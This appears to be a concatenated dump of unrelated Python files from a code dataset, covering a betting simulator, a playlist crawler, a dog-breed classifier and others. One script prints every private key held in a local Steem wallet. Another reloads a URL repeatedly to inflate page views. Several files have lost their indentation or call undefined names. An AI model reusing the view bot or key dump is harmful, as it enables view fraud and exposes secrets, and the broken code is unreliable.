        fullName = name+""+str(i)
        wb.del_worksheet(wb.worksheet(fullName))
def addGames(month, numDays):
    """Fill each day's worksheet with a header row plus one row per 2019 MLB
    game (home, away, game_id). Sleeps 1s per game to stay under the
    Sheets API rate limit."""
    scope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']
    creds = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope)
    client = gspread.authorize(creds)
    name = calendar.month_name[month]
    wb = client.open('BettingSim')
    for i in range(1, numDays+1):
        fullName = name+""+str(i)
        sheet = wb.worksheet(fullName)
        sheet.append_row(['Home', 'Away', 'Game_ID', 'Wager', 'Line', 'Result'])
        games = mlbgame.day(2019, month, i)
        for game in games:
            sheet.append_row([game.home_team, game.away_team, game.game_id])
            time.sleep(1)  # rate-limit protection
def evalGames(month, numDays):
    """Walk every day's worksheet for *month* and evaluate each recorded
    game via evalGame()."""
    scope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']
    creds = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope)
    client = gspread.authorize(creds)
    name = calendar.month_name[month]
    wb = client.open('BettingSim')
    for i in range(1, numDays + 1):
        fullName = name + "" + str(i)
        sheet = wb.worksheet(fullName)
        # one dict per data row, keyed by the header row
        list_of_hashes = sheet.get_all_records()
        for row in list_of_hashes:
            evalGame(row['Game_ID'], sheet)
def evalGame(game_id, sheet):
    """Look up the box score for *game_id* and mark the game's Result cell
    'win' when the first inning was scoreless on both sides.

    Errors from the mlbgame lookup or the sheet update are reported but
    swallowed so one bad game doesn't stop the month's evaluation.
    """
    try:
        innings = mlbgame.box_score(game_id).innings
        if not innings:
            print('debug stmt')
        # Fix: original used `is 0` — identity, not equality — which only
        # works by accident of CPython's small-int caching.
        if innings[0]['home'] + innings[0]['away'] == 0:
            id_cell = sheet.find(game_id)
            # Result column is 3 to the right of Game_ID (see header row)
            sheet.update_cell(id_cell.row + 3, id_cell.col + 3, 'win')
            time.sleep(1)  # rate-limit protection
    except Exception:
        print("innings issues")
# Rebuild April (month 4, 30 days) from scratch at import time:
# delete old sheets, recreate them, load games, then evaluate results.
clearMonth(4, 30)
initMonth(4, 30)
addGames(4, 30)
evalGames(4, 30)
987,117 | 3ed185a8180c764f085215df61c4010c356d5f7c | #!/usr/bin/env python
from pathlib import Path
from subprocess import run
# Build every conda recipe under ./recipes for each supported Python
# version by shelling out to the repo's build.py; check=True aborts the
# whole run on the first failed build.
root = Path(__file__).parent.resolve()
if __name__ == '__main__':
    for recipe in (root / 'recipes').glob('*'):
        for py_ver in ['2.7', '3.5', '3.6', '3.7']:
            run(['python', 'build.py', str(recipe), py_ver], cwd=root,
                check=True)
|
987,118 | d7c872be1c02d8c7620503c4ab284f7e9f6d2e56 | # author: hmin
# contact: hmin@zju.edu.cn
# datetime: 2019/10/3 22:31
# software: PyCharm 2017.1.2-Python 3.6.0(Anaconda)
# -*-coding:utf-8-*-
"""
文件说明
判断列表是否含有重复元素
"""
def has_duplicates(lst):
    """Return True when *lst* contains at least one repeated element,
    False otherwise (elements must be hashable)."""
    unique = set(lst)
    return len(unique) < len(lst)
987,119 | a70d0b2be64d80ebe7c1e1d7533e1944ea08a879 | import os
from random import randint
from tabulate import tabulate
import json
from mutagen.mp3 import MP3
import mutagen
class Song:
    """A single track: title, artist, album, and a length string.

    After __init__, ``legth_in_secs`` is a plain int attribute (the bound
    method is deliberately replaced by its computed value).
    """

    def __init__(self, title="Odin", artist="Manowar", album="The Sons of Odin", length="3:44"):
        self.title = title
        self.artist = artist
        self.album = album
        self.length = length
        # replace the method with its value so callers read it as an attribute
        self.legth_in_secs = self.legth_in_secs()

    def legth_in_secs(self):
        """Return the track length in seconds.

        The real parsing is stubbed out; placeholder constants are kept to
        preserve existing behavior (always returns 111).
        """
        total = 0
        total += 100  # int(self.length[:2])*60*60  # add secs
        total += 10   # int(self.length[-5:-3])*60  # add mins
        total += 1    # int(self.length[:2])  # add hours
        return total

    def __str__(self):
        return "{0} - {1} from {2} - {3}".format(self.artist, self.title, self.album, self.length)

    def __eq__(self, other):
        # Fix: original compared against `other.artists` (typo), so every
        # equality test raised AttributeError.
        return self.title == other.title and self.artist == other.artist

    def __hash__(self):
        # All songs share one hash bucket; __eq__ still disambiguates.
        return 123

    def lengths(self, minutes=False, seconds=False, hours=False):
        """Return the hours/minutes/seconds field sliced from the
        "HH:MM:SS" length string; None when no flag is set."""
        if hours:
            return self.length[:2]
        elif minutes:
            return self.length[-5:-3]
        elif seconds:
            return self.length[-2:]
class Playlist:
    """An ordered collection of Song objects with repeat/shuffle playback,
    tabulated printing, and JSON save/load helpers.

    Attributes:
        name: playlist name (spaces become '-' on save)
        repeat, shuffle: playback-mode flags used by next_song()
        content: list of Song objects
        current_song: index of the current track, or None until chosen
    """

    def __init__(self, name="Code", repeat=False, shuffle=False):
        self.name = name
        self.repeat = repeat
        self.shuffle = shuffle
        self.content = []
        self.current_song = None

    def add_song(self, song):
        self.content.append(song)
        # self.content[song.title] = [song.artist, song.album, song.length]

    def remove_song(self, song):
        self.content.remove(song)

    def add_songs(self, songs):
        # bulk add: delegates to add_song for each element
        for item in songs:
            self.add_song(item)

    def total_length(self):
        """Sum of legth_in_secs over all songs (int seconds)."""
        total_l = 0
        for item in self.content:
            total_l += item.legth_in_secs
        return total_l

    def artists(self):
        """Print each distinct song with its occurrence count.

        NOTE(review): counts Song objects, and Song.__eq__ ignores album —
        likely intended to count by artist name instead.
        """
        artist = {}
        for item in self.content:
            if item in artist:
                artist[item] += 1
            else:
                artist[item] = 1
        for item in artist:
            print(item.artist),
            print(artist[item])

    def curren_song(self):
        """Return the current song index, prompting the user on first call."""
        if self.current_song == None:
            current_song = input("select a number in our playlist - > ")
            self.current_song = int(current_song)
        return self.current_song

    def next_song(self):
        """Advance to the next song per the repeat/shuffle flags and return it.

        NOTE(review): branch ordering makes several repeat/shuffle
        combinations unreachable or incomplete, and
        randint(0, len(self.content)) can index one past the end —
        flagged, not fixed, to avoid silently changing playback behavior.
        """
        current_song = self.curren_song()
        # self.current_song = self.curren_song()
        # print(self.current_song)
        remaining_songs = self.content[self.current_song + 1:]
        if current_song == len(self.content) - 1 and self.repeat == False:
            return "no next song"
        if self.repeat is False and self.shuffle is False:
            self.current_song = current_song + 1
            return self.content[current_song + 1]
        if current_song == len(self.content) - 1 and self.repeat == True and self.shuffle == False:
            self.current_song = 0
            return self.content[0]
        if self.repeat is True and self.shuffle is True:
            self.current_song = randint(0, len(self.content))
            return self.content[self.current_song]
        if self.repeat is True and self.shuffle is False:
            # if self.current_song < len(self.content)-1:
            pass
        if self.repeat is False and self.shuffle is True:
            rand_selection = randint(0, len(remaining_songs) - 1)
            self.current_song = rand_selection
            return self.content[rand_selection]

    def print_content(self):
        # one str(Song) per line
        for i in range(0, len(self.content)):
            print (self.content[i])

    def pprint_playlist(self):
        """Print an org-mode table of artist / title / length."""
        table = []
        for i in range(0, (len(self.content))):
            table.append(
                [self.content[i].artist, self.content[i].title, self.content[i].length])
        headers = ['Artist', 'Title', 'Length of song']
        print(tabulate(table, headers, tablefmt='orgtbl'))

    def save(self):
        """Write {name: [str(song), ...]} to playlist_output.json
        (spaces in the name are replaced with '-')."""
        d = {}
        if ' ' in self.name:
            self.name = self.name.replace(" ", "-")
        d[self.name] = []
        for i in range(0, len(self.content)):
            d[self.name].append(str(self.content[i]))
        f = open("playlist_output.json", "w")
        json.dump(d, f)
        print(d)

    @staticmethod
    def load():
        """Read playlist_input.json and build a Playlist from its name.

        NOTE(review): the parsed songs are never added and the playlist is
        never returned — load() currently has no observable effect.
        """
        f = open("playlist_input.json", "r")
        data = json.load(f)
        for k, v in data.items():
            playlist_name = k
            playlist_songs = v
        playlist = Playlist(name=playlist_name)
        # print(playlist_songs)
# print(playlist_songs)
class MusicCrawler:
    """Scans a directory for .mp3 files and builds a Playlist from their
    ID3 tags via mutagen."""

    def __init__(self, path):
        self.path = path  # directory scanned by generate_playlist()

    def get_info(self, data):
        """Extract artist/album/title/length from a mutagen tag mapping.

        Each field independently falls back to an "Unknown ..." placeholder
        when the corresponding frame (TPE1/TALB/TIT2) or stream info is
        missing or malformed.
        """
        # Fix: datetime was never imported at module level, so the length
        # branch always raised NameError and fell back to "Unknown".
        import datetime
        song_data = {}
        try:
            song_data["artist"] = data["TPE1"].text[0]
        except Exception:
            song_data["artist"] = "Unknown Artist"
        try:
            song_data["album"] = data["TALB"].text[0]
        except Exception:
            song_data["album"] = "Unknown Album"
        try:
            song_data["title"] = data["TIT2"].text[0]
        except Exception:
            song_data["title"] = "Unknown Title"
        try:
            # whole seconds as "MM:SS"-style text (strip the "0:" hour prefix)
            song_data["length"] = str(
                datetime.timedelta(seconds=data.info.length // 1))[2:]
        except Exception:
            song_data["length"] = "Unknown"
        return song_data

    def generate_playlist(self):
        """Create a Playlist containing a Song for every .mp3 in self.path."""
        play_list = Playlist()
        tracks = [mp3 for mp3 in os.listdir(self.path) if mp3.endswith(".mp3")]
        for track in tracks:
            data = mutagen.File(self.path + "/" + track)
            info = self.get_info(data)
            new_song = Song(artist=info["artist"], title=info[
                "title"], album=info["album"], length=info["length"])
            play_list.add_song(new_song)
        return play_list
# Ad-hoc exercise of the classes above, run at import time: build two songs,
# a playlist, print lengths/tables, then crawl a local music directory.
some_song = Song(length="22:32:44")
other_song = Song(
    title='tttttitle', album='allBUM', artist='Man', length="01:32:32")
print(other_song.legth_in_secs)
li = [some_song, other_song]
some_playlist = Playlist(name='s wmw t')
print(some_song.legth_in_secs)
# some_playlist.add_song(some_song)
print(some_playlist.content)
# some_playlist.remove_song(some_song)
some_playlist.add_songs(li)
# print(some_playlist.content)
print(some_playlist.total_length())
# print(some_playlist.current_song())
# print(some_playlist.next_song())
print(some_playlist.pprint_playlist())
Playlist.load()
# hard-coded local path — will fail on other machines
crawler = MusicCrawler("/home/mihail/Music/CD1")
print(crawler.generate_playlist().name)
|
987,120 | 58b9780ad70e7d19ece6ff483b0c98e3d9521394 | # escreva um program que leia dois numeros inteiro
#e compare os mostrando na tela uma mensagem
# o primeiro valor e maior
#o segundo valor e maior
# nao existe valor maior os dois sao iguais
n1 = int(input('digiter um numero: '))
n2 = int(input('digite outro numero: '))
if n1 > n2:
print('o maio valor é ', n1)
elif n2 > n1:
print('o maior valor é ', n2)
else:
print('os valores sao iguais')
|
987,121 | 55ad8b02d64a7ae53b720275f1fa9879606ca263 | from steemapi.steemwalletrpc import SteemWalletRPC
from pprint import pprint
import time
def dumpkeys(account, typ):
    """Print the WIF private key for each public key of *account*'s
    authority *typ* ('active', 'owner' or 'posting').

    Keys the wallet does not hold raise inside get_private_key and are
    silently skipped.
    """
    name = account["name"]
    keys = account[typ]["key_auths"]
    for key in keys:
        try:
            # key[0] is the public key; the wallet returns its WIF secret
            wif = rpc.get_private_key(key[0])
            print("%10s: %10s: %s %s" % (
                name, typ, key[0], wif))
        except:
            pass
# Connect to a local cli_wallet and dump every account's keys.
rpc = SteemWalletRPC("localhost", 8092, "", "")
accounts = rpc.list_my_accounts()
# NOTE(review): asserts the wallet IS locked, and `is_locked` without ()
# may be a truthy method object — the intent was probably to require an
# *unlocked* wallet; confirm against the wallet RPC API.
assert rpc.is_locked, "Wallet is locked"
for account in accounts:
    dumpkeys(account, "active")
    dumpkeys(account, "owner")
    dumpkeys(account, "posting")
|
987,122 | f70867c4886983852966d2ad6814ba66f034e44e | # Communication with mongo
from pymongo import MongoClient
# Retreive congiguration info
import ConfigParser
# Reading the config file (Python 2 script: ConfigParser, print statements)
config = ConfigParser.RawConfigParser()
config.read('read.cfg')
# Reading database settings
client = MongoClient()
db = client[config.get('mongodb', 'db')]
collection = config.get('mongodb', 'collection')
statistics_collection = config.get('mongodb', 'stats_collection')
id_collection = config.get('mongodb', 'id_collection')
# shared state used by the graph-building helpers below
edgelist = []
dictionary = dict()   # user _id -> original idNum
edgedict = dict()     # "userA+userB" -> (idA, idB) edge, deduped both ways
nodeDict = dict()     # user _id -> 1 for every user that appears in an edge
users = dict()
# Makes it so that only nodes with 5 posts or higher get added to edgelist
for doc in db[statistics_collection].find({'value.posts': {'$gt': 5}}):
    users[doc.get('_id')] = 1
# Add new edge to the list
def append_graph(username, connections):
    """Record an undirected edge (by idNum) from *username* to each eligible
    connection, skipping users below the post threshold and edges already
    seen in either direction. Progress is printed every 5000 edges."""
    gen = []
    for c in connections:
        if(users.get(c) is not None) and (edgedict.get(username+c) is None) and (edgedict.get(c+username) is None):
            edgedict[username+c] = (dictionary.get(c), dictionary.get(username))
            nodeDict[c] = 1
            nodeDict[username] = 1
            if len(edgedict.keys()) % 5000 == 0:
                if 0 != len(edgelist):
                    print(edgedict.get(username+connections[0]))
                print(len(edgedict.keys()))
#Create id numbers for each user.
def create_idNum():
i = 0
for doc in db[statistics_collection].find():
db[statistics_collection].update({'_id': doc.get("_id")}, {'$set': {'idNum': i}})
dictionary[doc.get("_id")] = i
i = i+1
print "added idnumer"
#Create the list of edges with users having 5 or more posts
def creat_list():
x = 0
for doc in db[statistics_collection].find({'value.posts': {'$gt': 5}}):
x = x + 1
append_graph(doc.get("_id"), list(set(doc.get("value").get("friends"))))
print "list is ready"
# write edges to file
with open('edgelist.txt', 'w') as f:
for k in edgedict.values():
line = ' '.join(str(x) for x in k)
f.write(line + '\n')
print "Number of nodes "+ str(len(nodeDict.keys()))
#Create collection with documents in edgelist
for document in db[statistics_collection].find():
if nodeDict.get(document.get("_id")) is not None:
db[id_collection].insert(document)
i = 0
#Set new id numbers and save in dictionarty.
dictionaryNewID = dict()
for doc1 in db[id_collection].find():
dictionaryNewID[doc1.get("idNum")] = i
db[id_collection].update({'_id': doc1.get("_id")}, {'$set': {'idNum': i}})
i = i+1
#update the edgelist with new id numbers
"Number of nodes " + str(len(dictionaryNewID.keys()))
with open('edgelist.txt','r') as f:
with open('NewEdgelist.txt', 'w') as fp:
line = f.readline().strip('\n')
while line:
val = line.split(' ')
s = str(dictionaryNewID.get(int(val[0])))+' '+str(dictionaryNewID.get(int(val[1])))+'\n'
fp.write(s)
line = f.readline().strip('\n')
print "Number of edges " + str(len(edgedict.keys()))
if __name__ == '__main__':
print len(users)
create_idNum()
creat_list()
|
987,123 | a6c759adb6d381c3b36f61552eddb2eac15b9b09 | from .AnimGroup import AnimGroup
# This is the root of an AnimChannel hierarchy. It
# knows the frame rate and number of frames of all the
# channels in the hierarchy (which must all match).
class AnimBundle(AnimGroup):
    """Root of an AnimChannel hierarchy; carries the frame rate and frame
    count shared by every channel in the hierarchy."""
    def __init__(self, bam_file, bam_version):
        AnimGroup.__init__(self, bam_file, bam_version)
    def load(self, di):
        # Field order must mirror write(): fps (float32), then num_frames (uint16).
        AnimGroup.load(self, di)
        self.fps = di.get_float32()
        self.num_frames = di.get_uint16()
    def write(self, write_version, dg):
        # Serialize the base group first, then our two extra fields.
        AnimGroup.write(self, write_version, dg)
        dg.add_float32(self.fps)
        dg.add_uint16(self.num_frames)
    def __str__(self):
        return f'AnimBundle(fps={self.fps}, num_frames={self.num_frames}, {AnimGroup.__str__(self)})'
|
987,124 | b6a87b06cda22b2750d49f6f1c248a451f8081c8 | if __name__ == '__main__':
import context
from autem.evaluators import Evaluater
from benchmark.utility import *
from pathlib import Path
import os
import csv
import pandas
import numpy as np
# from benchmark.download_opemml_task import download_task_data
def baselines_directory():
    """Root folder holding one sub-folder per baseline."""
    return Path("benchmark/baselines")
def baseline_configuration_filename():
    # NOTE(review): benchmark_directory() is not defined in this module --
    # presumably supplied by `from benchmark.utility import *`; verify.
    return benchmark_directory().joinpath("Configuration.xlsx")
def load_baseline_configuration_data():
    """Load the baseline configuration spreadsheet as a DataFrame."""
    filename = baseline_configuration_filename()
    df = pandas.read_excel(filename)
    return df
def get_baseline_names(experiment, status = "Run"):
    """Names of baselines whose *experiment* column equals *status*."""
    df = load_baseline_configuration_data()
    dfa = df[df[experiment] == status]
    return dfa.Name
def get_baseline_configuration(name):
    """Configuration row for the named baseline, as a plain dict."""
    df = load_baseline_configuration_data()
    dfa = df[df['Name'] == name]
    configuration = dfa.to_dict('records')[0]
    return configuration
def baseline_directory(baseline_name):
    """Folder holding one baseline's artifacts."""
    return baselines_directory().joinpath(baseline_name)
def baseline_data_filename(baseline_name):
    """Path of the per-run results CSV for the named baseline."""
    return baseline_directory(baseline_name).joinpath("baseline.csv")
def load_baseline_data(baseline_name):
    """Read the baseline's run results (one row per run) from CSV."""
    filename = baseline_data_filename(baseline_name)
    df = pandas.read_csv(filename)
    return df
def get_baseline_stats(baseline_name):
    """Summarise the predictive-accuracy distribution of a baseline's runs.

    Returns a dict with the run count and median/max/min plus several upper
    percentiles of the `predictive_accuracy` column.
    """
    data = load_baseline_data(baseline_name)
    accuracy = data.predictive_accuracy
    return {
        "n_runs": data.shape[0],
        "median_score": np.median(accuracy),
        "max_score": np.max(accuracy),
        "min_score": np.min(accuracy),
        "top_1p": np.percentile(accuracy, 99),
        "top_5p": np.percentile(accuracy, 95),
        "top_10p": np.percentile(accuracy, 90),
        "top_qtr": np.percentile(accuracy, 75),
    }
class BaselineStats(Evaluater):
    """
    Rater that reports on the members baseline
    """
    def __init__(self, baseline_name):
        self.baseline_name = baseline_name
    def prepare_simulation(self, simulation):
        # Compute the baseline stats once and cache them on the simulation.
        super().prepare_simulation(simulation)
        baseline_name = self.baseline_name
        stats = get_baseline_stats(baseline_name)
        simulation.set_state("baseline_stats", stats)
    def record_member(self, member, record):
        # Attach the baseline's best and top-5% scores to each member record.
        stats = member.get_simulation().get_state("baseline_stats")
        record.BL_top_score = stats["max_score"]
        record.BL_top_5p_score = stats["top_5p"]
if __name__ == '__main__':
    # Smoke test: print stats for every baseline marked "Run" under "Select".
    names = get_baseline_names("Select")
    for name in names:
        print(get_baseline_stats(name))
|
987,125 | ab5e1343c4eed1e52f9a4cfc7c589c4c07366198 | import time
import re
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
# Configurations
options = Options()
# NOTE(review): `options.headless` is deprecated in newer Selenium releases
# in favour of options.add_argument("--headless"); confirm the target version.
options.headless = True
driver = webdriver.Chrome(options=options)
def urls_views(url, delay, views):
    """Visit *url* `views` times in the shared driver, waiting for the page's
    `timer` element to show '0' on each visit.

    :param url: page to visit; validated against a URL regex first
    :param delay: seconds to sleep before retrying a refused connection
    :param views: number of visits to perform
    :return: dict mapping visit index -> url, or {'Error': url} for a
        malformed url
    """
    output = {}
    i = 0
    # Check url
    regex = re.compile(
        r'^(?:http|ftp)s?://'  # http:// or https://
        r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|'  # domain...
        r'localhost|'  # localhost...
        r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'  # ...or ip
        r'(?::\d+)?'  # optional port
        r'(?:/?|[/?]\S+)$', re.IGNORECASE)
    if re.match(regex, url) is not None:
        # Fix: strict < so exactly `views` visits happen (the original <=
        # performed views + 1), and record every visit in `output` instead
        # of overwriting it each iteration.
        while i < views:
            page = ''
            while page == '':
                try:
                    page = driver.get(url)
                    WebDriverWait(driver, 30).until(
                        EC.text_to_be_present_in_element(
                            (By.CLASS_NAME, 'timer'),  # Element filtration
                            '0'  # The expected text
                        )
                    )
                    output[i] = url
                    break
                except Exception:
                    # Fix: narrowed the bare except. Retry after a pause.
                    print("Connection refused by the server..")
                    print("Let me sleep for 5 seconds")
                    print("ZZzzzz...")
                    time.sleep(delay)
                    print("Was a nice sleep, now let me continue...")
                    continue
            i += 1
            print(f" Visitado {i} veces")
    else:
        # print(f"La direccion web es incorrecta --> {url}")
        output = {'Error': url}
    return output
def close_connection():
    """Close the current window of the module-level Selenium driver."""
    driver.close()
|
987,126 | cd809d0b3edc4605b9a0f393e9a767281816dde7 |
from sklearn.datasets import load_files
from keras.utils import np_utils
import numpy as np
from glob import glob
# define function to load train, test, and validation datasets
def load_dataset(path):
    """Load an sklearn-style image folder; return (file paths, one-hot targets).

    The class count is hard-coded to 133 dog breeds.
    """
    data = load_files(path)
    dog_files = np.array(data['filenames'])
    dog_targets = np_utils.to_categorical(np.array(data['target']), 133)
    return dog_files, dog_targets
# load train, test, and validation datasets
# train_files, train_targets = load_dataset('D:/Courses/Udacity Nanodegrees/Machine Learning Nanodegree/Projects/Project 3 - Dog Breed Classifier/dog_breed_classifier/dogImages/train')
# valid_files, valid_targets = load_dataset('D:/Courses/Udacity Nanodegrees/Machine Learning Nanodegree/Projects/Project 3 - Dog Breed Classifier/dog_breed_classifier/dogImages/valid')
# test_files, test_targets = load_dataset('D:/Courses/Udacity Nanodegrees/Machine Learning Nanodegree/Projects/Project 3 - Dog Breed Classifier/dog_breed_classifier/dogImages/test')
# load list of dog names
# NOTE(review): item[20:-1] assumes a fixed 20-character path prefix, which
# does not match the absolute Windows-style path used here -- the breed
# names are probably truncated incorrectly; verify.
dog_names = [item[20:-1] for item in sorted(glob('D:/Courses/Udacity Nanodegrees/Machine Learning Nanodegree/Projects/Project 3 - Dog Breed Classifier/dog_breed_classifier/dogImages/train/*/'))]
# print statistics about the dataset
# print('There are %d total dog categories.' % len(dog_names))
# print('There are %s total dog images.\n' % len(np.hstack([train_files, valid_files, test_files])))
# print('There are %d training dog images.' % len(train_files))
# print('There are %d validation dog images.' % len(valid_files))
# print('There are %d test dog images.'% len(test_files))
# ### Import Human Dataset
#
# In the code cell below, we import a dataset of human images, where the file paths are stored in the numpy array `human_files`.
# In[2]:
# import random
# random.seed(8675309)
# load filenames in shuffled human dataset
# human_files = np.array(glob("lfw/*/*"))
# random.shuffle(human_files)
# print statistics about the dataset
# print('There are %d total human images.' % len(human_files))
import cv2
import matplotlib.pyplot as plt
# returns "True" if face is detected in image stored at img_path
def face_detector(img_path):
    # NOTE(review): face_cascade is not defined in this file -- it must be a
    # cv2.CascadeClassifier created elsewhere, otherwise this raises NameError.
    img = cv2.imread(img_path)
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    faces = face_cascade.detectMultiScale(gray)
    return len(faces) > 0
from keras.preprocessing import image
from tqdm import tqdm
def path_to_tensor(img_path):
    """Load one image and return it as a (1, 224, 224, 3) float tensor."""
    # loads RGB image as PIL.Image.Image type
    img = image.load_img(img_path, target_size=(224, 224))
    # convert PIL.Image.Image type to 3D tensor with shape (224, 224, 3)
    x = image.img_to_array(img)
    # convert 3D tensor to 4D tensor with shape (1, 224, 224, 3) and return 4D tensor
    return np.expand_dims(x, axis=0)
def paths_to_tensor(img_paths):
    """Stack per-image tensors into an (N, 224, 224, 3) batch (with progress bar)."""
    list_of_tensors = [path_to_tensor(img_path) for img_path in tqdm(img_paths)]
    return np.vstack(list_of_tensors)
from keras.applications.resnet50 import preprocess_input, decode_predictions
#
# def ResNet50_predict_labels(img_path):
# # returns prediction vector for image located at img_path
# img = preprocess_input(path_to_tensor(img_path))
# return np.argmax(ResNet50_model.predict(img))
#
### returns "True" if a dog is detected in the image stored at img_path
def dog_detector(img_path):
    # ImageNet class indices 151..268 correspond to dog breeds.
    # NOTE(review): ResNet50_predict_labels is only present in a commented-out
    # block above, so calling this raises NameError until it is restored.
    prediction = ResNet50_predict_labels(img_path)
    return ((prediction <= 268) & (prediction >= 151))
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
# pre-process the data for Keras
# train_tensors = paths_to_tensor(train_files).astype('float32')/255
# valid_tensors = paths_to_tensor(valid_files).astype('float32')/255
# test_tensors = paths_to_tensor(test_files).astype('float32')/255
# In[13]:
from keras.layers import Conv2D, MaxPooling2D, GlobalAveragePooling2D
from keras.layers import Dropout, Flatten, Dense
from keras.models import Sequential
# NOTE(review): `model` is created but never configured or used below.
model = Sequential()
# print(train_tensors.shape[1:])
# print(len(dog_names))
from keras.callbacks import ModelCheckpoint
# bottleneck_fetures_Xception = np.load('/data/bottleneck_features/DogXceptionData.npz')
# valid_Xception = bottleneck_fetures_Xception['valid']
# test_Xception = bottleneck_fetures_Xception['test']
# train_Xception = bottleneck_fetures_Xception['train']
# print(train_Xception.shape)
### TODO: Define your architecture.
# Classifier head on top of pre-computed Xception bottleneck features:
# (7, 7, 2048) maps -> global average pool -> dense softmax over breeds.
Xception_model = Sequential()
Xception_model.add(GlobalAveragePooling2D(input_shape = ( 7, 7, 2048)))
Xception_model.add(Dropout(0.3))
Xception_model.add(Dense(512, activation = 'relu'))
Xception_model.add(Dropout(0.3))
Xception_model.add(Dense(len(dog_names), activation='softmax'))
Xception_model.summary()
### TODO: Compile the model.
Xception_model.compile(loss='categorical_crossentropy', optimizer='rmsprop',metrics=['accuracy'])
### TODO: Train the model.
# checkpointer_Xception = ModelCheckpoint(filepath=r'D:\Courses\Udacity Nanodegrees\Machine Learning Nanodegree\Projects\Project 3 - Dog Breed Classifier\dog_breed_classifier\saved_models\weights_best_Xception.hdf5', verbose=1, save_best_only=True)
# Xception_model.fit(train_Xception, train_targets, validation_data=(valid_Xception, valid_targets),
#                   callbacks=[checkpointer_Xception], nb_epoch=25, batch_size = 40, verbose = 1)
# ### (IMPLEMENTATION) Load the Model with the Best Validation Loss
# In[29]:
### TODO: Load the model weights with the best validation loss.
Xception_model.load_weights(r'D:\Courses\Udacity Nanodegrees\Machine Learning Nanodegree\Projects\Project 3 - Dog Breed Classifier\dog_breed_classifier\saved_models\weights_best_Xception.hdf5')
# get index of predicted dog breed for each image in test set
# NOTE(review): test_Xception is only defined in the commented-out np.load
# block above, so this line raises NameError as written.
Xception_predictions = [np.argmax(Xception_model.predict(np.expand_dims(feature, axis=0))) for feature in test_Xception]
# report test accuracy
# test_accuracy = 100*np.sum(np.array(Xception_predictions)==np.argmax(test_targets, axis=1))/len(Xception_predictions)
# print('Test accuracy: %.4f%%' % test_accuracy)
def Xception_predict_breed(img_path):
    """Return the predicted breed name for the image at *img_path*."""
    # extract bottleneck features
    # print('image shape: ', img_path)
    image_tensor = path_to_tensor(img_path)
    # print('tensor shape: ', image_tensor.shape)
    # NOTE(review): extract_Xception is not defined in this file -- it must
    # be provided elsewhere, otherwise this call raises NameError.
    image_bottleneck_feature = extract_Xception(image_tensor)
    # print('bottleneck features shape: ', image_bottleneck_feature.shape)
    # obtain predicted vector
    predicted_vector_Xception = Xception_model.predict(image_bottleneck_feature)
    # return dog breed that is predicted by the model
    return dog_names[np.argmax(predicted_vector_Xception)]
# a function that checks if the image contains a face or a dog and returns the corresponding string to be printed
# import matplotlib.image as mpimg
# def dog_or_human(filepath):
# dog = dog_detector(filepath)
# human = face_detector(filepath)
# return dog, human
# def classify_dog_breed(filepath):
# # img = mpimg.imread(filepath)
# # fig = plt.figure()
# # ax = fig.add_subplot(1,1,1)
# # ax.imshow(img) #show image
# img = cv2.imread(filepath)
# # cv2.imshow('img', img)
# # dog, human = dog_or_human(filepath)
# if(dog):
# breed = Xception_predict_breed(filepath)
# print('You look like a', breed)
# elif(human):
# breed = Xception_predict_breed(filepath)
# print("If you were a dog you'd be a", breed)
# else:
# print("This is neither a dog nor a valid human face!")
def classify_dog_breed(filepath):
    """Predict and print the dog breed for the image at *filepath*."""
    # img = mpimg.imread(filepath)
    # fig = plt.figure()
    # ax = fig.add_subplot(1,1,1)
    # ax.imshow(img) #show image
    img = cv2.imread(filepath)  # NOTE(review): loaded but never used
    # cv2.imshow('img', img)
    # dog, human = dog_or_human(filepath)
    breed = Xception_predict_breed(filepath)
    print('You look like a', breed)
# Demo invocation on a local test image; waitKey keeps any OpenCV window open.
classify_dog_breed(r'D:\Courses\Udacity Nanodegrees\Machine Learning Nanodegree\Projects\Project 3 - Dog Breed Classifier\dog_breed_classifier\testing_files\me.jpg')
cv2.waitKey(0)
|
987,127 | 53d2566ac0e63936b8d1854c076faf74c3b6d45c | from keras.applications.vgg16 import VGG16
import numpy as np
class NnFeatureLoader:
    """Extracts image features with a headless VGG16 and caches them as CSV."""

    def __init__(self):
        # ImageNet weights, classification head removed: output is a conv map.
        self.model = VGG16(weights='imagenet', include_top=False)

    def describe_model(self):
        """Print the Keras layer summary of the underlying VGG16."""
        self.model.summary()

    def __get_feature(self, image):
        # Coerce to the (1, 224, 224, 3) batch shape VGG16 expects, then
        # flatten the resulting feature map into a 1-D vector.
        batch = np.resize(image, (1, 224, 224, 3))
        return self.model.predict(batch).flatten()

    def __get_features(self, images):
        # Grayscale inputs -> 3-channel float images of shape (28, 28, 3),
        # then one feature vector per image.
        prepared = np.dstack([images] * 3).reshape(-1, 28, 28, 3).astype('float32')
        return np.array([self.__get_feature(img) for img in prepared])

    def save_features(self, images, prefix):
        """Extract features for *images* and write them under data/features/."""
        np.savetxt(f"data/features/nn_{prefix}.csv", self.__get_features(images), delimiter=",")

    def load_features(self, prefix):
        """Read back a feature matrix previously written by save_features."""
        return np.genfromtxt(f"data/features/nn_{prefix}.csv", delimiter=',')
|
987,128 | 6e5c256b9a5b9133cbeac2c7393548afbb611a65 | #!/usr/bin/env python3
import logging
import queue
import socket
import threading
# Guards the shared `clients` list across server and client threads.
lock = threading.Lock()
logging.basicConfig(
    format='%(asctime)-15s %(clientip)-15s %(call)-8s %(message)s')
logger = logging.getLogger('telnetrelay')
logger.setLevel(logging.INFO)
# All currently connected RelayServer instances.
clients = []
class RelayServer(threading.Thread):
    """One thread per connected telnet client; relays queued spots to it."""

    def __init__(self, info):
        """*info* is the (socket, address) pair returned by socket.accept()."""
        threading.Thread.__init__(self)
        self.socket = info[0]
        self.address = info[1]
        self.loginfo = {'clientip': self.address[0], 'call': '---'}
        self.queue = queue.Queue()

    def run(self):
